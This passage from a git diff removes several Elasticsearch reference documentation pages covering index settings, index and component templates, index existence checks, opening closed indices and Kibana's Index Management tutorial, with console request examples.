streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. 
-+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -``:: -(Optional, string) Comma-separated list or wildcard expression of setting names -used to limit the request. - - -[[get-index-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-index-settings-api-example]] -==== {api-examples-title} - -===== Multiple data streams and indices - -The get settings API can be used to get settings for more than one data stream or index with a -single call. To get settings for all indices in a cluster, you can use `_all` or `*` for ``. -Wildcard expressions are also supported. The following are some examples: - -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002/_settings - -GET /_all/_settings - -GET /log_2099_*/_settings --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\nPUT log_2099_01_01\n/] - -===== Filtering settings by name - -The settings that are returned can be filtered with wildcard matching -as follows: - -[source,console] --------------------------------------------------- -GET /log_2099_-*/_settings/index.number_* --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/indices/index-mgmt.asciidoc b/docs/reference/indices/index-mgmt.asciidoc deleted file mode 100644 index 0dcfbe04556..00000000000 --- a/docs/reference/indices/index-mgmt.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[[index-mgmt]] -== Index management - -{kib}'s *Index Management* features are an easy, convenient way to manage your -cluster's indices, <>, and <>. Practicing good index management ensures your data is stored -correctly and in the most cost-effective way possible. - -[discrete] -[[index-mgmt-wyl]] -=== What you'll learn - -You'll learn how to: - -* View and edit index settings. -* View mappings and statistics for an index. -* Perform index-level operations, such as refreshes and freezes. -* View and manage data streams. -* Create index templates to automatically configure new data streams and indices. - -[discrete] -[[index-mgm-req-permissions]] -=== Required permissions - -If you use {es} {security-features}, the following -<> are required: - -* The `monitor` cluster privilege to access {kib}'s *Index Management* features. -* The `view_index_metadata` and `manage` index privileges to view a data stream -or index's data. -* The `manage_index_templates` cluster privilege to manage index templates. - -To add these privileges in {kib}, go to *Stack Management > Security > Roles*. - -[discrete] -[[view-edit-indices]] -=== View and edit indices - -Open {kib}'s main menu and click *Stack Management > Index Management*. - -[role="screenshot"] -image::images/index-mgmt/management_index_labels.png[Index Management UI] - -The *Index Management* page contains an overview of your indices. 
-Badges indicate if an index is <>, a -<>, or a -<>. - -Clicking a badge narrows the list to only indices of that type. -You can also filter indices using the search bar. - -You can drill down into each index to investigate the index -<>, <>, and statistics. -From this view, you can also edit the index settings. - -[role="screenshot"] -image::images/index-mgmt/management_index_details.png[Index Management UI] - -[float] -=== Perform index-level operations - -Use the *Manage* menu to perform index-level operations. This menu -is available in the index details view, or when you select the checkbox of one or more -indices on the overview page. The menu includes the following actions: - -* <> -* <> -* <> -* <> -* <> -* <> -* *Add* <> - -[float] -[[manage-data-streams]] -=== Manage data streams - -The *Data Streams* view lists your data streams and lets you examine or delete -them. - -To view more information about a data stream, such as its generation or its -current index lifecycle policy, click the stream's name. - -[role="screenshot"] -image::images/index-mgmt/management_index_data_stream_stats.png[Data stream details] - -To view information about the stream's backing indices, click the number in the -*Indices* column. - -[role="screenshot"] -image::images/index-mgmt/management_index_data_stream_backing_index.png[Backing index] - -[float] -[[manage-index-templates]] -=== Manage index templates - -The *Index Templates* view lists your templates and lets you examine, -edit, clone, and delete them. Changes made to an index template do not -affect existing indices. - -[role="screenshot"] -image::images/index-mgmt/management-index-templates.png[Index templates] - -If you don't have any templates, you can create one using the *Create template* -wizard. - -[float] -==== Try it: Create an index template - -In this tutorial, you’ll create an index template and use it to configure two -new indices. - -*Step 1. Add a name and index pattern* - -. In the *Index Templates* view, open the *Create template* wizard. -+ -[role="screenshot"] -image::images/index-mgmt/management_index_create_wizard.png[Create wizard] - -. In the *Name* field, enter `my-index-template`. - -. Set *Index pattern* to `my-index-*` so the template matches any index -with that index pattern. - -. Leave *Data Stream*, *Priority*, *Version*, and *_meta field* blank or as-is. - -*Step 2. Add settings, mappings, and index aliases* - -. Add <> to your index template. -+ -Component templates are pre-configured sets of mappings, index settings, and -index aliases you can reuse across multiple index templates. Badges indicate -whether a component template contains mappings (*M*), index settings (*S*), -index aliases (*A*), or a combination of the three. -+ -Component templates are optional. For this tutorial, do not add any component -templates. -+ -[role="screenshot"] -image::images/index-mgmt/management_index_component_template.png[Component templates page] - -. Define index settings. These are optional. For this tutorial, leave this -section blank. - -. 
Define a mapping that contains an <> field named `geo` with a -child <> field named `coordinates`: -+ -[role="screenshot"] -image::images/index-mgmt/management-index-templates-mappings.png[Mapped fields page] -+ -Alternatively, you can click the *Load JSON* link and define the mapping as JSON: -+ -[source,js] ----- -{ - "properties": { - "geo": { - "properties": { - "coordinates": { - "type": "geo_point" - } - } - } - } -} ----- -// NOTCONSOLE -+ -You can create additional mapping configurations in the *Dynamic templates* and -*Advanced options* tabs. For this tutorial, do not create any additional -mappings. - -. Define an index alias named `my-index`: -+ -[source,js] ----- -{ - "my-index": {} -} ----- -// NOTCONSOLE - -. On the review page, check the summary. If everything looks right, click -*Create template*. - -*Step 3. Create new indices* - -You’re now ready to create new indices using your index template. - -. Index the following documents to create two indices: -`my-index-000001` and `my-index-000002`. -+ -[source,console] ----- -POST /my-index-000001/_doc -{ - "@timestamp": "2019-05-18T15:57:27.541Z", - "ip": "225.44.217.191", - "extension": "jpg", - "response": "200", - "geo": { - "coordinates": { - "lat": 38.53146222, - "lon": -121.7864906 - } - }, - "url": "https://media-for-the-masses.theacademyofperformingartsandscience.org/uploads/charles-fullerton.jpg" -} - -POST /my-index-000002/_doc -{ - "@timestamp": "2019-05-20T03:44:20.844Z", - "ip": "198.247.165.49", - "extension": "php", - "response": "200", - "geo": { - "coordinates": { - "lat": 37.13189556, - "lon": -76.4929875 - } - }, - "memory": 241720, - "url": "https://theacademyofperformingartsandscience.org/people/type:astronauts/name:laurel-b-clark/profile" -} ----- - -. Use the <> to view the configurations for the -new indices. The indices were configured using the index template you created -earlier. -+ -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002 --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/indices/index-template-exists-v1.asciidoc b/docs/reference/indices/index-template-exists-v1.asciidoc deleted file mode 100644 index c71d9cddda4..00000000000 --- a/docs/reference/indices/index-template-exists-v1.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[indices-template-exists-v1]] -=== Index template exists API -++++ -Index template exists (legacy) -++++ - -IMPORTANT: This documentation is about <>, which are deprecated and will be replaced by the composable -templates introduced in {es} 7.8. For information about composable templates, -see <>. - -Checks if an <> exists. - - - -[source,console] ------------------------------------------------ -HEAD /_template/template_1 ------------------------------------------------ - - -[[template-exists-api-request]] -==== {api-request-title} - -`HEAD /_template/` - - -[[template-exists-api-desc]] -==== {api-description-title} - -Use the index template exists API -to determine whether one or more index templates exist. - -Index templates define <>, <>, -and <> that can be applied automatically to new indices. 
- -[[template-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] - - -[[template-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[template-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified index templates exist. - -`404`:: -Indicates one or more specified index templates **do not** exist. diff --git a/docs/reference/indices/index-templates.asciidoc b/docs/reference/indices/index-templates.asciidoc deleted file mode 100644 index 1fe8597360b..00000000000 --- a/docs/reference/indices/index-templates.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[index-templates]] -= Index templates - -NOTE: This topic describes the composable index templates introduced in {es} 7.8. -For information about how index templates worked previously, -see the <>. - -[[getting]] -An index template is a way to tell {es} how to configure an index when it is created. -For data streams, the index template configures the stream's backing indices as they -are created. Templates are configured prior to index creation and then when an -index is created either manually or through indexing a document, the template -settings are used as a basis for creating the index. - -There are two types of templates, index templates and <>. Component templates are reusable building blocks that configure mappings, settings, and -aliases. You use component templates to construct index templates, they aren't directly applied to a -set of indices. Index templates can contain a collection of component templates, as well as directly -specify settings, mappings, and aliases. - -If a new data stream or index matches more than one index template, the index template with the highest priority is used. - -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid an overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -When a composable template matches a given index -it always takes precedence over a legacy template. If no composable template matches, a legacy -template may still match and be applied. - -If an index is created with explicit settings and also matches an index template, -the settings from the create index request take precedence over settings specified in the index template and its component templates. 
- -[source,console] --------------------------------------------------- -PUT _component_template/component_template1 -{ - "template": { - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT _component_template/other_component_template -{ - "template": { - "mappings": { - "properties": { - "ip_address": { - "type": "ip" - } - } - } - } -} - -PUT _index_template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - }, - "aliases": { - "mydata": { } - } - }, - "priority": 200, - "composed_of": ["component_template1", "other_component_template"], - "version": 3, - "_meta": { - "description": "my custom" - } -} --------------------------------------------------- -// TESTSETUP - -//// - -[source,console] --------------------------------------------------- -DELETE _index_template/* -DELETE _component_template/* --------------------------------------------------- -// TEARDOWN - -//// - -include::simulate-multi-component-templates.asciidoc[] diff --git a/docs/reference/indices/indices-exists.asciidoc b/docs/reference/indices/indices-exists.asciidoc deleted file mode 100644 index ede01258468..00000000000 --- a/docs/reference/indices/indices-exists.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[indices-exists]] -=== Index exists API -++++ -Index exists -++++ - -Checks if an index exists. - -[source,console] --------------------------------------------------- -HEAD /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - - -[[indices-exists-api-request]] -==== {api-request-title} - -`HEAD /` - - -[[indices-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -IMPORTANT: This parameter does not distinguish between an index name and <>, -i.e. status code `200` is also returned if an alias exists with that name. - - -[[indices-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[indices-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified indices or index aliases exist. - - `404`:: -Indicates one or more specified indices or index aliases **do not** exist. diff --git a/docs/reference/indices/open-close.asciidoc b/docs/reference/indices/open-close.asciidoc deleted file mode 100644 index 713d007ee9f..00000000000 --- a/docs/reference/indices/open-close.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[[indices-open-close]] -=== Open index API -++++ -Open index -++++ - -Opens a closed index. For data streams, the API -opens any closed backing indices. 
- -[source,console] --------------------------------------------------- -POST /my-index-000001/_open --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/POST \/my-index-000001\/_close\n/] - - -[[open-index-api-request]] -==== {api-request-title} - -`POST //_open` - - -[[open-index-api-desc]] -==== {api-description-title} - -You can use the open index API to re-open closed indices. If the request targets -a data stream, the request re-opens any of the stream's closed backing indices. - -// tag::closed-index[] - -A closed index is blocked for read/write operations and does not allow -all operations that opened indices allow. It is not possible to index -documents or to search for documents in a closed index. This allows -closed indices to not have to maintain internal data structures for -indexing or searching documents, resulting in a smaller overhead on -the cluster. - -When opening or closing an index, the master is responsible for -restarting the index shards to reflect the new state of the index. -The shards will then go through the normal recovery process. The -data of opened/closed indices is automatically replicated by the -cluster to ensure that enough shard copies are safely kept around -at all times. - -You can open and close multiple indices. An error is thrown -if the request explicitly refers to a missing index. This behaviour can be -disabled using the `ignore_unavailable=true` parameter. - -All indices can be opened or closed at once using `_all` as the index name -or specifying patterns that identify them all (e.g. `*`). - -Identifying indices via wildcards or `_all` can be disabled by setting the -`action.destructive_requires_name` flag in the config file to `true`. -This setting can also be changed via the cluster update settings api. - -Closed indices consume a significant amount of disk-space which can cause -problems in managed environments. Closing indices can be disabled via the cluster settings -API by setting `cluster.indices.close.enable` to `false`. The default is `true`. - -The current write index on a data stream cannot be closed. In order to close -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be closed. - -// end::closed-index[] - -[[open-index-api-wait-for-active-shards]] -===== Wait for active shards - -// tag::wait-for-active-shards[] - -Because opening or closing an index allocates its shards, the -<> setting on -index creation applies to the `_open` and `_close` index actions as well. - -// end::wait-for-active-shards[] - - - - -[[open-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list or wildcard (`*`) expression of data streams, indices, and -index aliases used to limit the request. -+ -To target all data streams and indices, use `_all` or `*`. -+ -To disallow use of `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. - - -[[open-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `closed`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[open-index-api-example]] -==== {api-examples-title} - -The following request re-opens a closed index named `my-index-000001`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_open --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPOST my-index-000001\/_close\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true, - "shards_acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/indices/put-component-template.asciidoc b/docs/reference/indices/put-component-template.asciidoc deleted file mode 100644 index 2b935b91143..00000000000 --- a/docs/reference/indices/put-component-template.asciidoc +++ /dev/null @@ -1,212 +0,0 @@ -[[indices-component-template]] -=== Put component template API -++++ -Put component template -++++ - -Creates or updates a component template. -Component templates are building blocks for constructing <> -that specify index <>, <>, -and <>. - -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _component_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-component-template-api-request]] -==== {api-request-title} - -`PUT /_component_template/` - - -[[put-component-template-api-desc]] -==== {api-description-title} - -An index template can be composed of multiple component templates. -To use a component template, specify it in an index template's `composed_of` list. -Component templates are only applied to new data streams and indices -as part of a matching index template. - -Settings and mappings specified directly in the index template or the <> -request override any settings or mappings specified in a component template. - -Component templates are only used during index creation. For data streams, this -includes data stream creation and the creation of a stream's backing indices. -Changes to component templates do not -affect existing indices, including a stream's backing indices. - -===== Comments in component templates -You can use C-style /* */ block comments in component templates. -You can include comments anywhere in the request body, -except before the opening curly bracket. - -[[put-component-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the component template to create. - - -[[put-component-template-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing component templates. -Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[put-component-template-api-request-body]] -==== {api-request-body-title} - -`template`:: -(Required, object) -This is the template to be applied, may optionally include a `mappings`, -`settings`, or `aliases` configuration. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -NOTE: You cannot add data streams to an index alias. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -`version`:: -(Optional, integer) -Version number used to manage component templates externally. -This number is not automatically generated or incremented by {es}. - -`_meta`:: -(Optional, object) -Optional user metadata about the component template. May have any contents. -This map is not automatically generated by {es}. - -[[put-component-template-api-example]] -==== {api-examples-title} - -===== Component template with index aliases - -You can include <> in a component template. - -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } - } -} --------------------------------------------------- -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - -[[applying-component-templates]] -===== Applying component templates - -You cannot directly apply a component template to a data stream or index. -To be applied, a component template must be included in an index template's `composed_of` list. See <>. - -[[component-templates-version]] -===== Component template versioning - -You can use the `version` parameter to add a version number to a component template. -External systems can use these version numbers to simplify template management. - -The `version` parameter is optional and not automatically generated or used by {es}. - -To unset a `version`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, you can use the <>. - -[[component-templates-metadata]] -===== Component template metadata - -You can use the `_meta` parameter to add arbitrary metadata to a component template. -This user-defined object is stored in the cluster state, -so keeping it short is preferrable. - -The `_meta` parameter is optional and not automatically generated or used by {es}. - -To unset `_meta`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "_meta": { - "description": "set number of shards to one", - "serialization": { - "class": "MyComponentTemplate", - "id": 10 - } - } -} --------------------------------------------------- - -To check the `_meta`, you can use the <> API. 
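-
-For example, the following request (a minimal illustration) returns the stored
-component template so you can verify its `version` and `_meta` values:
-
-[source,console]
---------------------------------------------------
-GET /_component_template/template_1
---------------------------------------------------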
diff --git a/docs/reference/indices/put-index-template-v1.asciidoc b/docs/reference/indices/put-index-template-v1.asciidoc deleted file mode 100644 index 578694ef8c2..00000000000 --- a/docs/reference/indices/put-index-template-v1.asciidoc +++ /dev/null @@ -1,259 +0,0 @@ -[[indices-templates-v1]] -=== Put index template API -++++ -Put index template (legacy) -++++ - -IMPORTANT: This documentation is about legacy index templates, -which are deprecated and will be replaced by the composable templates introduced in {es} 7.8. -For information about composable templates, see <>. - -Creates or updates an index template. - -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-index-template-v1-api-request]] -==== {api-request-title} - -`PUT /_template/` - - -[[put-index-template-v1-api-desc]] -==== {api-description-title} - -Use the PUT index template API -to create or update an index template. - -Index templates define <> and <> -that you can automatically apply when creating new indices. -{es} applies templates to new indices -based on an index pattern that matches the index name. - -NOTE: Composable templates always take precedence over legacy templates. -If no composable template matches a new index, -matching legacy templates are applied according to their order. - -Index templates are only applied during index creation. -Changes to index templates do not affect existing indices. -Settings and mappings specified in <> API requests -override any settings or mappings specified in an index template. - -===== Comments in index templates -You can use C-style /* */ block comments in index templates. -You can include comments anywhere in the request body, -except before the opening curly bracket. - -[[getting-v1]] -===== Getting templates - -See <>. - - -[[put-index-template-v1-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index template to create. - - -[[put-index-template-v1-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing index templates. -Defaults to `false`. - -`order`:: -(Optional,integer) -Order in which {es} applies this template -if index matches multiple templates. -+ -Templates with lower `order` values are merged first. -Templates with higher `order` values are merged later, -overriding templates with lower values. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[put-index-template-v1-api-request-body]] -==== {api-request-body-title} - -`index_patterns`:: -(Required, array of strings) -Array of wildcard expressions -used to match the names of indices during creation. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This number is not automatically generated by {es}. - - -[[put-index-template-v1-api-example]] -==== {api-examples-title} - -===== Index template with index aliases - -You can include <> in an index template. - -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns" : ["te*"], - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } -} --------------------------------------------------- - -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - - -[[multiple-templates-v1]] -===== Indices matching multiple templates - -Multiple index templates can potentially match an index, in this case, -both the settings and mappings are merged into the final configuration -of the index. The order of the merging can be controlled using the -`order` parameter, with lower order being applied first, and higher -orders overriding them. For example: - -[source,console] --------------------------------------------------- -PUT /_template/template_1 -{ - "index_patterns" : ["te*"], - "order" : 0, - "settings" : { - "number_of_shards" : 1 - }, - "mappings" : { - "_source" : { "enabled" : false } - } -} - -PUT /_template/template_2 -{ - "index_patterns" : ["tes*"], - "order" : 1, - "settings" : { - "number_of_shards" : 1 - }, - "mappings" : { - "_source" : { "enabled" : true } - } -} --------------------------------------------------- - -The above will disable storing the `_source`, but -for indices that start with `tes*`, `_source` will still be enabled. -Note, for mappings, the merging is "deep", meaning that specific -object/property based mappings can easily be added/overridden on higher -order templates, with lower order templates providing the basis. - -NOTE: Multiple matching templates with the same order value will -result in a non-deterministic merging order. - - -[[versioning-templates-v1]] -===== Template versioning - -You can use the `version` parameter -to add an optional version number to an index template. -External systems can use these version numbers -to simplify template management. - -The `version` parameter is completely optional -and not automatically generated by {es}. - -To unset a `version`, -replace the template without specifying one. 
- -[source,console] --------------------------------------------------- -PUT /_template/template_1 -{ - "index_patterns" : ["my-index-*"], - "order" : 0, - "settings" : { - "number_of_shards" : 1 - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, -you can use the <> API -with the <> query parameter -to return only the version number: - -[source,console] --------------------------------------------------- -GET /_template/template_1?filter_path=*.version --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "template_1" : { - "version" : 123 - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/indices/put-index-template.asciidoc b/docs/reference/indices/put-index-template.asciidoc deleted file mode 100644 index 047c98ff708..00000000000 --- a/docs/reference/indices/put-index-template.asciidoc +++ /dev/null @@ -1,358 +0,0 @@ -[[indices-put-template]] -=== Put index template API -++++ -Put index template -++++ - -Creates or updates an index template. -Index templates define <>, <>, -and <> that can be applied automatically to new indices. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-index-template-api-request]] -==== {api-request-title} - -`PUT /_index_template/` - - -[[put-index-template-api-desc]] -==== {api-description-title} - -{es} applies templates to new indices based on an -wildcard pattern that matches the index name. - -Index templates are applied during data stream or index creation. -For data streams, these settings and mappings are applied when the stream's backing indices are created. - -Settings and mappings specified in a <> -request override any settings or mappings specified in an index template. - -Changes to index templates do not affect -existing indices, including the existing backing indices of a data stream. - -===== Comments in index templates -You can use C-style /* */ block comments in index templates. You can include comments anywhere in -the request body, except before the opening curly bracket. - -[[put-index-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index template to create. - - -[[put-index-template-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing index templates. Defaults to `false`. - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[role="child_attributes"] -[[put-index-template-api-request-body]] -==== {api-request-body-title} - -`index_patterns`:: -(Required, array of strings) -Array of wildcard (`*`) expressions -used to match the names of data streams and indices during creation. -+ -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. 
-{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid an overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -[xpack]#`data_stream`#:: -(Optional, object) -Indicates whether the template is used to create data streams and their backing -indices. If so, use an empty object as the argument: + -`data_stream: { }`. -+ -Data streams require a matching index template with a `data_stream` object. -See <>. - -`template`:: -(Optional, object) -Template to be applied. It may optionally include an `aliases`, `mappings`, or -`settings` configuration. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{docdir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -NOTE: You cannot add data streams to an index alias. - -include::{docdir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -`composed_of`:: -(Optional, array of strings) -An ordered list of component template names. Component templates are merged in the order -specified, meaning that the last component template specified has the highest precedence. See -<> for an example. - -`priority`:: -(Optional, integer) -Priority to determine index template precedence when a new data stream or index is created. The index template with -the highest priority is chosen. If no priority is specified the template is treated as though it is -of priority 0 (lowest priority). -This number is not automatically generated by {es}. - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This number is not automatically generated by {es}. - -`_meta`:: -(Optional, object) -Optional user metadata about the index template. May have any contents. -This map is not automatically generated by {es}. - -[[put-index-template-api-example]] -==== {api-examples-title} - -===== Index template with index aliases - -You can include <> in an index template. - -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns" : ["te*"], - "template": { - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } - } -} --------------------------------------------------- -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - - -[[multiple-templates]] -===== Multiple matching templates - -If multiple index templates match the name of a new index or data stream, -the template with the highest priority is used. 
For example: - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["t*"], - "priority" : 0, - "template": { - "settings" : { - "number_of_shards" : 1, - "number_of_replicas": 0 - }, - "mappings" : { - "_source" : { "enabled" : false } - } - } -} - -PUT /_index_template/template_2 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - }, - "mappings" : { - "_source" : { "enabled" : true } - } - } -} --------------------------------------------------- - -For indices that start with `te*`, `_source` will enabled, and the index will have two primary -shards and one replica, because only `template_2` will be applied. - -NOTE: Multiple templates with overlapping index patterns at the same priority are not allowed, and -an error will be thrown when attempting to create a template matching an existing index template at -identical priorities. - - -[[versioning-templates]] -===== Template versioning - -You can use the `version` parameter to add a version number to an index template. -External systems can use these version numbers to simplify template management. - -The `version` parameter is optional and not automatically generated or used by {es}. - -To unset a `version`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["foo", "bar"], - "priority" : 0, - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, you can use the <> API. - -[[template-metadata]] -===== Template metadata - -You 